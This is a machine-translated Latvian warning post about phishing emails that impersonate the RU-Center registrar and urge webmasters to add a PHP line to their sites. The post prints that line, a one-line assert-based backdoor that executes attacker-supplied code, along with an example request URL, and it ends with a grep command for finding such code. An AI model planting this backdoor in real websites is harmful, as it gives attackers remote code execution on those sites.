Uzmanību "tīmekļa pārziņiem", kuri nezina PHP. Neaizsargātība.

Tas ir automātisks tulkojums.
Noklikšķiniet šeit, lai lasītu publikāciju oriģinālvalodā.

Šodien daži mani draugi saņēma vēstules, iespējams, no RU -Center (lielākais Krievijas domēna vārdu reģistrators) - nic.ru ar šādu saturu:

Vēstules tika nosūtītas no info@nic.technical . Vēstulē uzbrucēji, kuri pārstāv sevi RU centra vārdā, iesaka vietnē ievietot šādu kodu:

 <?php assert(stripslashes($_REQUEST[RUCENTER])); ?>

Diemžēl daudzi mūsu kolēģi, kuri sevi dēvē par “tīmekļa pārziņiem” (daudzi vietņu īpašnieki), nezina PHP un nedomā par iepriekš minētā koda bīstamību. Ja jūs šai funkcijai nododat virkni kā parametru, tad tā ar assert () tiks uzskatīta par PHP kodu! Esi uzmanīgs!

Es iesaku jums pārbaudīt savus php projektus, lai atklātu ievainojamības, izmantojot komandas assert vai eval. Ja šīs komandas ir projekta kodā, nekrītiet panikā - izpētiet to algoritmu. Pilnībā atļauta algoritmu izmantošana. Iepriekš minētā piemēra gadījumā komanda ļaus uzbrucējiem piezvanīt uz jūsu vietni, piemēram, izmantojot parametru RUCENTER- http://sistema-audit.ru/?RUCENTER=PHP-code

Mēs iesakām veikt meklēšanu, izmantojot, piemēram, linux komandu grep -i -r 'assert' / home / www / mysite / *, norādot mapi ar vietnes failiem, lai iegūtu to failu sarakstu, kuros ir aizdomīgas piemēram, tiek izmantots kods.

Rūpējieties par sevi un savām vietnēm!

Tas ir automātisks tulkojums.
Noklikšķiniet šeit, lai lasītu publikāciju oriģinālvalodā.